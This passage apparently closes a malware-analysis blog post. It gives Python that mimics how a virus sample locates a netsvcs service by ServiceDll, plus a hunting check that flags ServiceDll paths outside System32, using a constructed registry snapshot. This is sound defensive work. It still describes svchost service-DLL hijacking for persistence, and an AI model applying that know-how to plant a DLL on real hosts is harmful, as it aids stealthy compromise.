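def find_service_by_dll(netsvcs_blob: bytes, parameters: dict, target_dll: str):
    """Return the first netsvcs service whose ServiceDll equals target_dll
    under lstrcmpiA semantics (case-insensitive), or None. `parameters` maps a
    Parameters key path to its ServiceDll string and stands in for
    RegOpenKeyExA + RegQueryValueExA."""
    for name in parse_multi_sz(netsvcs_blob):
        dll = parameters.get(PARAMS_FMT % name)
        if dll is not None and dll.lower() == target_dll.lower():
            return name
    return None


def suspicious_netsvcs(netsvcs_blob: bytes, parameters: dict, system32: str) -> list:
    """Hunting check over the same data: report netsvcs entries whose
    ServiceDll resolves outside System32 or whose Parameters\\ServiceDll is
    missing. Returns (service, ServiceDll, reason) tuples."""
    hits = []
    sys32 = system32.lower()
    for name in parse_multi_sz(netsvcs_blob):
        dll = parameters.get(PARAMS_FMT % name)
        if dll is None:
            hits.append((name, None, "no Parameters\\ServiceDll"))
            continue
        expanded = dll.lower().replace("%systemroot%\\system32", sys32)
        if not expanded.startswith(sys32 + "\\"):
            hits.append((name, dll, "ServiceDll outside System32"))
    return hits


def demo_snapshot():
    """Constructed snapshot: netsvcs as stored (REG_MULTI_SZ, ANSI) and the
    ServiceDll of each service's Parameters key. Two entries are deliberately
    odd; none of the values is taken from the sample."""
    netsvcs = b"6to4\x00AppMgmt\x00AudioSrv\x00Browser\x00CryptSvc\x00\x00"
    params = {
        PARAMS_FMT % "6to4": r"C:\WINDOWS\system32\6to4.dll",          # constructed
        PARAMS_FMT % "AppMgmt": r"%SystemRoot%\System32\appmgmts.dll",
        PARAMS_FMT % "AudioSrv": r"%SystemRoot%\System32\audiosrv.dll",
        PARAMS_FMT % "Browser": r"C:\WINDOWS\Temp\tem81.dll",          # constructed
        # CryptSvc intentionally has no Parameters key in this snapshot
    }
    return netsvcs, params


if __name__ == "__main__":
    blob, params = demo_snapshot()
    print("netsvcs:", parse_multi_sz(blob))
    print("match:", find_service_by_dll(blob, params, r"c:\windows\SYSTEM32\6TO4.DLL"))
    for hit in suspicious_netsvcs(blob, params, r"C:\WINDOWS\system32"):
        print("suspicious:", hit)
```

The path check alone is not enough: the constructed 6to4 entry points into System32 and passes, which is exactly where a dropped DLL with a plausible name would sit. On a real host, pair the netsvcs walk with a hash or signature check of every ServiceDll it resolves.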
Friday, 4 June 2010
Repost: Analysis of a standard-PE-format virus sample